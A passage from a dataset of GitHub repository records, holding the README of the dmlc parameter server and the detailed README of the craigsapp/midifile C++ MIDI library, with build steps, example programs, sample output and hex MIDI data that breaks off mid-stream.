\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dmlc/parameter_server", "link": "https://github.com/dmlc/parameter_server", "tags": [], "stars": 634, "description": "moved to https://github.com/dmlc/ps-lite", "lang": "C++", "repo_lang": "", "readme": "The parameter server is a distributed system that scales to industry-size machine\nlearning problems. It provides asynchronous and zero-copy key-value pair\ncommunications between worker machines and server machines (see the sketch below). It also supports\nflexible data consistency models, data filters, and flexible server machine\nprogramming.\n\n**NOTE: We stopped maintaining this repo. Please check the newer version called [ps-lite](https://github.com/dmlc/ps-lite)**\n\n- [Document](doc/)\n- [Wiki](https://github.com/dmlc/parameter_server/wiki/)\n- How to [build](make/)\n- Examples\n  - [Linear method](example/linear), [Linear method with Cloud](docker)\n  - Deep neural network, see [CXXNET](https://github.com/dmlc/cxxnet) and [Minerva](https://github.com/minerva-developers/minerva)\n
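As a flavor of that worker-side key-value interface, here is a short C++ sketch modeled on the successor ps-lite's README example; constructor arguments and setup/teardown calls vary between versions, so treat the exact signatures as assumptions:

```cpp
#include <vector>
#include "ps/ps.h"   // from the successor project, ps-lite

void RunWorker() {
    // A worker-side handle to the distributed key-value store held by servers.
    ps::KVWorker<float> kv(0, 0);             // (app id, customer id) - version-dependent

    std::vector<ps::Key> keys = {1, 3, 5};    // keys must be unique and sorted
    std::vector<float>   vals = {1.0f, 1.0f, 1.0f};

    // Push is asynchronous and returns a timestamp; Wait blocks on completion.
    int ts = kv.Push(keys, vals);
    kv.Wait(ts);

    // Pull the (possibly updated) values back from the servers.
    std::vector<float> recv;
    kv.Wait(kv.Pull(keys, &recv));
}
```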
", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "craigsapp/midifile", "link": "https://github.com/craigsapp/midifile", "tags": [], "stars": 634, "description": "C++ classes for reading/writing Standard MIDI Files", "lang": "C++", "repo_lang": "", "readme": "Midifile: C++ MIDI file parsing library\n=======================================\n\n\n[![Travis Build Status](https://travis-ci.org/craigsapp/midifile.svg?branch=master)](https://travis-ci.org/craigsapp/midifile) [![AppVeyor Build Status](https://ci.appveyor.com/api/projects/status/oo393u60ut1rtbf3?svg=true)](https://ci.appveyor.com/project/craigsapp/midifile)\n\nMidifile is a library of C++ classes for reading/writing Standard\nMIDI files. The library consists of 6 classes:\n\n- **MidiFile**: The main interface for dealing with MIDI files. The MidiFile class appears as a two-dimensional array of MidiEvents: the first dimension is a list of tracks, and the second dimension is a list of MidiEvents.\n- **MidiEventList**: A data structure that manages the list of MidiEvents for a MIDI file track.\n- **MidiEvent**: The primary storage unit for MidiMessages in a MidiFile. The class consists of a tick timestamp (delta or absolute) and a vector of MIDI message bytes (or Standard MIDI File meta messages).\n- **MidiMessage**: The base class for MidiEvents. This is an STL vector of unsigned bytes representing a MIDI (or meta) message.\n- **Binasc**: A helper class for MidiFile that allows reading/writing of MIDI files in an ASCII format describing the bytes of the binary Standard MIDI Files.
\n\nHere is a schematic of how the classes are used together:\n\n![Class organization](https://user-images.githubusercontent.com/3487289/39109564-493bca94-4682-11e8-87c4-991a931ca41b.png)\n\nThe `MidiFile` class contains a vector of tracks stored in `MidiEventList`\nobjects. The `MidiEventList` is itself a vector of `MidiEvent`s, which stores\neach MIDI event in the track. `MidiEvent`s contain a timestamp and a `MidiMessage`\nwhich is a vector of unsigned char values, storing the raw bytes of a MIDI message\n(or meta-message).\n\n\nDocumentation is under construction at\n[http://midifile.sapp.org](http://midifile.sapp.org).\nEssential examples for reading and writing MIDI files\nare given below.\n\n\nDownloading\n-----------\n\nYou can download as a ZIP file from the Github page for the midifile library,\nor if you use git, then download with this command:\n\n``` bash\ngit clone https://github.com/craigsapp/midifile\n```\n\nThis will create the `midifile` directory with the source code for the library.\n\n\n\nCompiling with GCC\n------------------\n\nThe library can be compiled with the command:\n``` bash\nmake library\n```\n\nThis will create the file `lib/libmidifile.a` which can be used to link\nto programs that use the library. Example programs can be compiled with\nthe command:\n``` bash\nmake programs\n```\nThis will compile all example programs in the tools directory. Compiled\nexample programs will be stored in the `bin` directory. To compile both the\nlibrary and the example programs all in one step, type:\n``` bash\nmake\n```\n\nTo compile only a single program, such as `createmidifile`, type:\n``` bash\nmake createmidifile\n```\nYou can also place your own programs in `tools`, such as `myprogram.cpp`\nand to compile type:\n``` bash\nmake myprogram\n```\nThe compiled program will be `bin/myprogram`.\n\n\nUsing in your own project\n-------------------------\n\nThe easiest way to use the midifile library in your own project is to\ncopy the header files in the `include` directory and the source-code\nfiles in the `src` directory into your own project. You do not\nneed to copy `Options.h` or `Options.cpp` since the `MidiFile` class is\nnot dependent on them. The [verovio](https://github.com/rism-ch/verovio)\nand [midiroll](https://github.com/craigsapp/midiroll) projects on Github\nboth use this method to use the midifile library. Alternatively, you\ncan fork the midifile repository and build a compiled library file of\nthe source code that can be copied with the `include` directory contents\ninto your project.\n\n\nMIDI file reading examples\n--------------------------\n\nThe following program lists all MidiEvents in a MIDI file. The program\niterates over each track, printing a list of all MIDI events in the track.\nFor each event, the absolute tick timestamp for the performance time of\nthe MIDI message is given, followed by the message itself as a list of\nhex bytes.\n\nYou can run the `MidiFile::doTimeAnalysis()` function to convert\nthe absolute tick timestamps into seconds, according to any tempo\nmeta-messages in the file (using a default tempo of 120 quarter notes\nper minute if there are no tempo meta-messages). The absolute starting\ntime of the event is shown in the second column of the program's output.\n\nThe `MidiFile::linkNotePairs()` function can be used to match note-ons\nand note-offs. When this is done, you can access the duration of the\nnote with `MidiEvent::getDurationInSeconds()` for note-on messages. 
The\nnote durations are shown in the third column of the program's output.\n\nNote that the midifile library classes are in the `smf` namespace,\nso `using namespace smf;` or `smf::` prefixes are needed to access\nthe classes.\n\n``` cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\n#include <iomanip>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n   Options options;\n   options.process(argc, argv);\n   MidiFile midifile;\n   if (options.getArgCount() == 0) midifile.read(cin);\n   else midifile.read(options.getArg(1));\n   midifile.doTimeAnalysis();\n   midifile.linkNotePairs();\n\n   int tracks = midifile.getTrackCount();\n   cout << \"TPQ: \" << midifile.getTicksPerQuarterNote() << endl;\n   if (tracks > 1) cout << \"TRACKS: \" << tracks << endl;\n   for (int track=0; track<tracks; track++) {\n      if (tracks > 1) cout << \"\\nTrack \" << track << endl;\n      cout << \"Tick\\tSeconds\\tDur\\tMessage\" << endl;\n      for (int event=0; event<midifile[track].size(); event++) {\n         cout << dec << midifile[track][event].tick;\n         cout << '\\t' << dec << midifile[track][event].seconds;\n         cout << '\\t';\n         if (midifile[track][event].isNoteOn())\n            cout << midifile[track][event].getDurationInSeconds();\n         cout << '\\t' << hex;\n         for (int i=0; i<midifile[track][event].size(); i++)\n            cout << (int)midifile[track][event][i] << ' ';\n         cout << endl;\n      }\n   }\n   return 0;\n}\n```\n\nHere is the output of the program for a short three-track example file:\n\n
\nTPQ: 120\nTRACKS: 3\n\nTrack 0\nTick\tSeconds\tDur\tMessage\n0\t0\t\tff 2f 0\n\nTrack 1\nTick\tSeconds\tDur\tMessage\n0\t0\t0.5\t90 48 40\n120\t0.5\t\t80 48 40\n120\t0.5\t0.5\t90 48 40\n240\t1\t\t80 48 40\n240\t1\t0.5\t90 4f 40\n360\t1.5\t\t80 4f 40\n360\t1.5\t0.5\t90 4f 40\n480\t2\t\t80 4f 40\n480\t2\t0.5\t90 51 40\n600\t2.5\t\t80 51 40\n600\t2.5\t0.5\t90 51 40\n720\t3\t\t80 51 40\n720\t3\t1\t90 4f 40\n960\t4\t\t80 4f 40\n960\t4\t0.5\t90 4d 40\n1080\t4.5\t\t80 4d 40\n1080\t4.5\t0.5\t90 4d 40\n1200\t5\t\t80 4d 40\n1200\t5\t0.5\t90 4c 40\n1320\t5.5\t\t80 4c 40\n1320\t5.5\t0.5\t90 4c 40\n1440\t6\t\t80 4c 40\n1440\t6\t0.5\t90 4a 40\n1560\t6.5\t\t80 4a 40\n1560\t6.5\t0.5\t90 4a 40\n1680\t7\t\t80 4a 40\n1680\t7\t1\t90 48 40\n1920\t8\t\t80 48 40\n1920\t8\t\tff 2f 0\n\nTrack 2\nTick\tSeconds\tDur\tMessage\n0\t0\t0.5\t90 30 40\n120\t0.5\t\t80 30 40\n120\t0.5\t0.5\t90 3c 40\n240\t1\t\t80 3c 40\n240\t1\t0.5\t90 40 40\n360\t1.5\t\t80 40 40\n360\t1.5\t0.5\t90 3c 40\n480\t2\t\t80 3c 40\n480\t2\t0.5\t90 41 40\n600\t2.5\t\t80 41 40\n600\t2.5\t0.5\t90 3c 40\n720\t3\t\t80 3c 40\n720\t3\t0.5\t90 40 40\n840\t3.5\t\t80 40 40\n840\t3.5\t0.5\t90 3c 40\n960\t4\t\t80 3c 40\n960\t4\t0.5\t90 3e 40\n1080\t4.5\t\t80 3e 40\n1080\t4.5\t0.5\t90 3b 40\n1200\t5\t\t80 3b 40\n1200\t5\t0.5\t90 3c 40\n1320\t5.5\t\t80 3c 40\n1320\t5.5\t0.5\t90 39 40\n1440\t6\t\t80 39 40\n1440\t6\t0.5\t90 35 40\n1560\t6.5\t\t80 35 40\n1560\t6.5\t0.5\t90 37 40\n1680\t7\t\t80 37 40\n1680\t7\t1\t90 30 40\n1920\t8\t\t80 30 40\n1920\t8\t\tff 2f 0\n
\n\nThe default behavior of the `MidiFile` class is to store the absolute\ntick times of MIDI events, available in `MidiEvent::tick`, which is the\ntick time from the start of the file to the current event. In standard\nMIDI files, ticks are stored as delta values, where the tick indicates the\nduration to wait since the previous message in a track. To access the\ndelta tick values, you can either (1) subtract the current tick time from\nthe previous tick time in the list, or (2) call `MidiFile::makeDeltaTime()`\nto convert the absolute tick values into delta tick values.\n\nThe `MidiFile::joinTracks()` function can be used to convert multi-track\ndata into a single time sequence. The `joinTracks()` operation can be\nreversed by calling the `MidiFile::splitTracks()` function. 
Here is a sample program that joins the `MidiEvents` into a single track so that the\ndata can be processed in a single loop:\n\n``` cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\n#include <iomanip>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n   Options options;\n   options.process(argc, argv);\n   MidiFile midifile;\n   if (options.getArgCount() > 0) midifile.read(options.getArg(1));\n   else midifile.read(cin);\n   cout << \"TPQ: \" << midifile.getTicksPerQuarterNote() << endl;\n   cout << \"TRACKS: \" << midifile.getTrackCount() << endl;\n   midifile.joinTracks();\n   // midifile.getTrackCount() will now return \"1\", but the original\n   // track assignments can be seen in the .track field of each MidiEvent.\n   cout << \"TICK    DELTA   TRACK   MIDI MESSAGE\\n\";\n   cout << \"____________________________________\\n\";\n   MidiEvent* mev;\n   int deltatick;\n   for (int event=0; event < midifile[0].size(); event++) {\n      mev = &midifile[0][event];\n      if (event == 0) deltatick = mev->tick;\n      else deltatick = mev->tick - midifile[0][event-1].tick;\n      cout << dec << mev->tick;\n      cout << '\\t' << deltatick;\n      cout << '\\t' << mev->track;\n      cout << '\\t' << hex;\n      for (int i=0; i < mev->size(); i++)\n         cout << (int)(*mev)[i] << ' ';\n      cout << endl;\n   }\n   return 0;\n}\n```\n\nBelow is the new single-track output. The first column is the absolute\ntick timestamp of the message; the second column is the delta tick value;\nthe third column is the original track value; and the last column\ncontains the MIDI message (in hex bytes).\n\n
\nTPQ: 120\nTRACKS: 3\nTICK    DELTA   TRACK   MIDI MESSAGE\n____________________________________\n0\t0\t1\t90 48 40\n0\t0\t2\t90 30 40\n0\t0\t0\tff 2f 0\n120\t120\t1\t80 48 40\n120\t0\t2\t80 30 40\n120\t0\t2\t90 3c 40\n120\t0\t1\t90 48 40\n240\t120\t2\t80 3c 40\n240\t0\t1\t80 48 40\n240\t0\t2\t90 40 40\n240\t0\t1\t90 4f 40\n360\t120\t2\t80 40 40\n360\t0\t1\t80 4f 40\n360\t0\t1\t90 4f 40\n360\t0\t2\t90 3c 40\n480\t120\t2\t80 3c 40\n480\t0\t1\t80 4f 40\n480\t0\t2\t90 41 40\n480\t0\t1\t90 51 40\n600\t120\t2\t80 41 40\n600\t0\t1\t80 51 40\n600\t0\t1\t90 51 40\n600\t0\t2\t90 3c 40\n720\t120\t1\t80 51 40\n720\t0\t2\t80 3c 40\n720\t0\t2\t90 40 40\n720\t0\t1\t90 4f 40\n840\t120\t2\t80 40 40\n840\t0\t2\t90 3c 40\n960\t120\t2\t80 3c 40\n960\t0\t1\t80 4f 40\n960\t0\t2\t90 3e 40\n960\t0\t1\t90 4d 40\n1080\t120\t1\t80 4d 40\n1080\t0\t2\t80 3e 40\n1080\t0\t2\t90 3b 40\n1080\t0\t1\t90 4d 40\n1200\t120\t1\t80 4d 40\n1200\t0\t2\t80 3b 40\n1200\t0\t2\t90 3c 40\n1200\t0\t1\t90 4c 40\n1320\t120\t1\t80 4c 40\n1320\t0\t2\t80 3c 40\n1320\t0\t1\t90 4c 40\n1320\t0\t2\t90 39 40\n1440\t120\t1\t80 4c 40\n1440\t0\t2\t80 39 40\n1440\t0\t1\t90 4a 40\n1440\t0\t2\t90 35 40\n1560\t120\t1\t80 4a 40\n1560\t0\t2\t80 35 40\n1560\t0\t2\t90 37 40\n1560\t0\t1\t90 4a 40\n1680\t120\t1\t80 4a 40\n1680\t0\t2\t80 37 40\n1680\t0\t2\t90 30 40\n1680\t0\t1\t90 48 40\n1920\t240\t1\t80 48 40\n1920\t0\t2\t80 30 40\n1920\t0\t1\tff 2f 0\n1920\t0\t2\tff 2f 0\n
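\nIf the per-track view is needed again after a joined pass like the one\nabove, the merge can simply be undone; a minimal sketch:\n\n``` cpp\nmidifile.joinTracks();  // one interleaved track, as in the output above\n// ... process all events in a single loop ...\nmidifile.splitTracks(); // restore the original track structure\n```\n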
\n\n\n\nMIDI file writing example\n--------------------------\n\nBelow is an example program to create a MIDI file. This program will\ngenerate a random sequence of notes and append them to the end of\nthe track. By default a `MidiFile` object contains a single track and\nwill be written as a type-0 MIDI file unless more tracks are added. After\nadding notes to the track, the track must be sorted into time sequence\nbefore being written to a file.\n\n\n``` cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\n#include <random>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"n|note-count=i:10\", \"How many notes to randomly play\");\n options.define(\"o|output-file=s\", \"Output filename (stdout if none)\");\n options.define(\"i|instrument=i:0\", \"General MIDI instrument number\");\n options.define(\"x|hex=b\", \"Hex byte-code output\");\n options.process(argc, argv);\n\n random_device rd;\n mt19937 mt(rd());\n uniform_int_distribution<int> starttime(0, 100);\n uniform_int_distribution<int> duration(1, 8);\n uniform_int_distribution<int> pitch(36, 84);\n uniform_int_distribution<int> velocity(40, 100);\n\n MidiFile midifile;\n int track = 0;\n int channel = 0;\n int instr = options.getInteger(\"instrument\");\n midifile.addTimbre(track, 0, channel, instr);\n\n int tpq = midifile.getTPQ();\n int count = options.getInteger(\"note-count\");\n for (int i=0; i<count; i++) {\n int starttick = int(starttime(mt) / 4.0 * tpq);\n int key = pitch(mt);\n int endtick = starttick + int(duration(mt) / 4.0 * tpq);\n midifile.addNoteOn(track, starttick, channel, key, velocity(mt));\n midifile.addNoteOff(track, endtick, channel, key);\n }\n midifile.sortTracks(); // sort since events were added in random tick order\n\n string filename = options.getString(\"output-file\");\n if (filename.empty()) {\n if (options.getBoolean(\"hex\")) midifile.writeHex(cout);\n else cout << midifile;\n } else midifile.write(filename);\n return 0;\n}\n```\n\n\nMIDI file reading example\n--------------------------\n\nThe following program reads a MIDI file given as its first argument and\nthen writes the data back out to the file given as its second argument:\n\n``` cpp\n#include \"MidiFile.h\"\n#include <iostream>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) return 1;\n MidiFile midifile;\n midifile.read(argv[1]);\n if (midifile.status()) midifile.write(argv[2]);\n else cerr << \"Problem reading MIDI file \" << argv[1] << endl;\n}\n```\n\nThe `MidiFile::read()` function will automatically identify if the\ninput is a binary standard MIDI file, a hex byte-code representation,\nor a generalized binasc syntax file (which includes byte-codes).\nThe `MidiFile::status()` function can be checked after reading a MIDI\nfile to determine if the file was read without problems.\n\n\nCode snippets\n-------------\n\n\n### How to process multiple input files and get duration of MIDI files ###\n\nThis example uses `MidiFile::getFileDurationInSeconds()` to calculate the\nduration of a MIDI file. Also, this example shows how to process multiple\ninput files when using the Options class.\n\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.process(argc, argv);\n MidiFile midifile;\n if (options.getArgCount() == 0) {\n midifile.read(cin);\n cout << midifile.getFileDurationInSeconds() << \" seconds\" << endl;\n } else {\n int count = options.getArgCount();\n for (int i=0; i<count; i++) {\n string filename = options.getArg(i+1);\n if (count > 1) cout << filename << \"\\t\";\n midifile.read(filename);\n cout << midifile.getFileDurationInSeconds() << \" seconds\" << endl;\n }\n }\n return 0;\n}\n```\n\n\n\n### How to extract text meta-messages from a MIDI file ###\n\nThe `MidiMessage::isText()` function will return true if the message\nis a text meta-message. The following program merges all tracks into\na single list and does one loop checking for text meta-messages, printing\nthem out when found. 
The `MidiMessage::getMetaContent()` function extracts\nthe text string of the message from the raw MIDI file bytes.\n\n```cpp\n#include \"MidiFile.h\"\n#include <iostream>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n MidiFile midifile;\n if (argc == 1) midifile.read(cin);\n else midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n midifile.joinTracks();\n for (int i=0; i<midifile[0].size(); i++) {\n if (midifile[0][i].isText())\n cout << midifile[0][i].getMetaContent() << endl;\n }\n return 0;\n}\n```\n\n\n### How to convert a multi-track MIDI file into a type-0 MIDI file ###\n\nThe following program joins all of the tracks into a single track and\nthen writes the result to the output file:\n\n```cpp\n#include \"MidiFile.h\"\n#include <iostream>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile;\n midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n midifile.joinTracks();\n midifile.write(argv[2]);\n\n return 0;\n}\n```\n\nThe `.joinTracks()` function merges all tracks into a single track, and if\na `MidiFile` object has only one track when it is being written, it will be\nwritten as a type-0 (single-track) MIDI file.\n\n\n\n### How to check for a drum track in a MIDI file ###\n\nIn General MIDI files, the drum track is on the 10th channel, which is\nrepresented by the integer 9. The following example searches through\nthe MIDI events in each track until it finds a note on channel 9:\n\n```cpp\n#include \"MidiFile.h\"\n#include <iostream>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n MidiFile midifile;\n if (argc == 1) midifile.read(cin);\n else midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n bool found = false;\n for (int i=0; i<midifile.getTrackCount(); i++) {\n for (int j=0; j<midifile[i].size(); j++) {\n if (!midifile[i][j].isNoteOn()) continue;\n if (midifile[i][j].getChannel() == 9) {\n found = true;\n break;\n }\n }\n if (found) break;\n }\n if (found) cout << \"MIDI file contains a drum track\" << endl;\n else cout << \"MIDI file does not contain a drum track\" << endl;\n return 0;\n}\n```\n\n\n### How to remove the drum track from a MIDI file ###\n\nThe following program clears all events on channel 9 (the General MIDI\npercussion channel) and writes the remaining events to the output file:\n\n```cpp\n#include \"MidiFile.h\"\n#include <iostream>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile;\n midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n for (int i=0; i<midifile.getTrackCount(); i++) {\n for (int j=0; j<midifile[i].size(); j++) {\n if (midifile[i][j].getChannel() == 9) midifile[i][j].clear();\n }\n }\n midifile.removeEmpties(); // delete the cleared events\n midifile.write(argv[2]);\n\n return 0;\n}\n```\n\n\n### How to transpose a MIDI file ###\n\nThe following program transposes all notes (other than percussion notes\non channel 9) by the number of semitones given with the `-t` option:\n\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.define(\"t|transpose=i:0\", \"Semitones to transpose by\");\n options.process(argc, argv);\n\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n if (!midifile.status()) {\n cerr << \"Could not read MIDI file\" << endl;\n return 1;\n }\n\n int transpose = options.getInteger(\"transpose\");\n for (int i=0; i<midifile.getTrackCount(); i++) {\n for (int j=0; j<midifile[i].size(); j++) {\n if (!midifile[i][j].isNote()) continue;\n if (midifile[i][j].getChannel() == 9) continue;\n int key = midifile[i][j].getKeyNumber();\n midifile[i][j].setKeyNumber(key + transpose);\n }\n }\n cout << midifile;\n return 0;\n}\n```\n\n\n### How to list the instrument numbers used in a MIDI file ###\n\nThe following program collects the patch-change messages in a MIDI file\nand prints one line for each unique track/instrument pairing:\n\n```cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include <iostream>\n#include <set>\n#include <utility>\n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.process(argc, argv);\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n if (!midifile.status()) {\n cerr << \"Could not read MIDI file\" << endl;\n return 1;\n }\n\n pair<int, int> trackinst;\n set<pair<int, int>> iset;\n for (int i=0; i<midifile.getTrackCount(); i++) {\n for (int j=0; j<midifile[i].size(); j++) {\n if (!midifile[i][j].isPatchChange()) continue;\n trackinst.first = i;\n trackinst.second = midifile[i][j].getP1();\n iset.insert(trackinst);\n }\n }\n for (auto& it : iset)\n cout << \"Track \" << it.first << \":\\tinstrument \" << it.second << endl;\n return 0;\n}\n```\n\n\n### How to convert a MIDI file to Pythagorean tuning ###\n\nThe following program moves each pitch class onto its own track and MIDI\nchannel and then inserts pitch-bend messages so that the notes sound in\nPythagorean tuning rather than equal temperament:\n\n```cpp\n#include \"MidiFile.h\"\n#include <iostream>\n#include <vector>\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n if (argc != 3) {\n cerr << \"Usage: \" << argv[0] << \" input output\" << endl;\n return 1;\n }\n MidiFile midifile;\n midifile.read(argv[1]);\n if (!midifile.status()) {\n cerr << \"Problem reading MIDI file\" << endl;\n return 1;\n }\n\n midifile.joinTracks();\n for (int i=0; i<midifile[0].size(); i++) {\n if (!midifile[0][i].isNote()) {\n midifile[0][i].track = 0;\n continue;\n }\n midifile[0][i].seq = 2;\n int pc = midifile[0][i].getKeyNumber() % 12;\n if (midifile[0][i].getChannel() != 9) {\n midifile[0][i].track = pc + 1;\n if (pc >= 9) pc++;\n midifile[0][i].setChannelNibble(pc);\n } else midifile[0][i].track = 13;\n }\n midifile.splitTracks();\n
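\n // MidiFile::addPitchBend() below takes a normalized bend amount, where\n // the full range from -1.0 to +1.0 maps onto the synthesizer's maximum\n // bend depth (assumed in this program to be 200 cents), so each tuning\n // deviation in cents is divided by that maximum bend depth.\n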
\n double maxbend = 200.0; // typical pitch-bend depth in cents on synthesizers\n // Pythagorean tuning deviations from equal temperament in cents:\n vector<double> pythagorean = {-3.91, 9.78, 0.00, -9.78, 3.91, -5.87, 7.82,\n -1.96, -11.73, 1.96, -7.82, 5.87};\n\n for (int i=0; i<12; i++) {\n int maxtrack = midifile.getTrackCount();\n int track = i+1;\n if (track >= maxtrack) break;\n int channel = i;\n if (i >= 9) channel++;\n double bend = pythagorean[i] / maxbend;\n MidiEvent* me = midifile.addPitchBend(track, 0, channel, bend);\n me->seq = 1;\n }\n\n midifile.sortTracks();\n midifile.write(argv[2]);\n\n return 0;\n}\n```\n\nThe `MidiFile::splitTracks()` function will generate 13 or 14 tracks. Track 0\nwill contain all non-note MIDI messages from the original file, while tracks\n1 to 12 will contain notes of a specific pitch-class on MIDI channels 1-12,\nskipping channel 10 (the General MIDI percussion channel). Percussion notes\nwill be placed in track 13, but remain on channel 10.\n\nSetting `MidiEvent::seq` to 1 for the pitch bends and 2 for the notes forces\nthe first notes at tick time 0 to be placed after the pitch-bend messages\ninserted at the same timestamp when `MidiFile::sortTracks()` is called\n(when events occur at the same time in a track, those with a lower sequence\nnumber are sorted before those with a higher number). The pitch-bend\nmessages would probably be sorted before the notes anyway, but using `seq`\nguarantees that they are placed before the first notes.\n\nTry this program on Bach's Well-Tempered Clavier, Book I, Fugue No. 4\nin C-sharp minor:\n\n```\n4d 54 68 64 00 00 00 06 00 01 00 06 00 78 4d 54 72 6b 00 00 00 13 00 ff 51 03 08 8e 6c 00 ff 58 04 02 01 30 08 00 ff 2f\n00 4d 54 72 6b 00 00 09 bd b2 50 90 49 40 81 70 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b\n40 83 60 80 4b 40 00 90 49 40 82 68 80 49 40 00 90 4b 40 78 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4b 40 78 80 4b 40 00\n90 49 40 81 70 80 49 40 00 90 47 40 81 70 80 47 40 00 90 49 40 81 70 80 49 40 00 90 4b 40 81 70 80 4b 40 82 68 90 4c 40\n78 80 4c 40 00 90 4b 40 78 80 4b 40 00 90 49 40 78 80 49 40 00 90 47 40 78 80 47 40 00 90 4b 40 78 80 4b 40 00 90 50 40\n82 68 80 50 40 00 90 4e 40 78 80 4e 40 00 90 50 40 78 80 50 40 00 90 51 40 78 80 51 40 00 90 53 40 84 58 80 53 40 00 90\n51 40 78 80 51 40 00 90 50 40 78 80 50 40 00 90 4e 40 78 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90\n4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 83 60 80 49 40 00 90 47 40 82 68 80 47 40 00 90 49 40 78 80 49 40\n00 90 47 40 78 80 47 40 00 90 45 40 78 80 45 40 00 90 44 40 81 70 80 44 40 00 90 46 40 78 80 46 40 00 90 47 40 78 80 47\n40 00 90 49 40 81 70 80 49 40 00 90 47 40 83 60 80 47 40 00 90 46 40 81 70 80 46 40 00 90 47 40 84 58 80 47 40 00 90 49\n40 78 80 49 40 00 90 4b 40 78 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4c 40 81 70 80 4c 40 00 90 4b 40 81 70 80 4b 40 00\n90 4c 40 78 80 4c 40 00 90 4b 40 78 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4e 40 78 80 4e 40 00 90 50 40 3c 80 50 40 00\n90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 51 40 3c 80 51 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00\n90 4c 40 3c 80 4c 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00\n90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4e 40 3c 80 4e 40 00\n90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00\n90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 
40 00\n90 4b 40 3c 80 4b 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00\n90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40 00\n90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 46 40 3c 80 46 40 00 90 49 40 3c 80 49 40 00 90 47 40 82 2c 80 47 40\n00 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40 00 90 47 40 3c 80 47 40 00 90 49 40 82 68 80 49 40 00 90 4c 40 78 80 4c\n40 00 90 4b 40 82 68 80 4b 40 00 90 4e 40 78 80 4e 40 00 90 4c 40 84 58 80 4c 40 00 90 4b 40 81 70 80 4b 40 00 90 49 40\n81 70 80 49 40 00 90 48 40 3c 80 48 40 00 90 46 40 3c 80 46 40 00 90 48 40 78 80 48 40 00 90 4b 40 78 80 4b 40 00 90 50\n40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 51 40 3c 80 51 40 00 90 50 40 3c 80 50 40 00 90 4e\n40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e\n40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4e\n40 3c 80 4e 40 00 90 4d 40 81 70 80 4d 40 00 90 51 40 81 70 80 51 40 00 90 50 40 84 58 80 50 40 00 90 4e 40 3c 80 4e 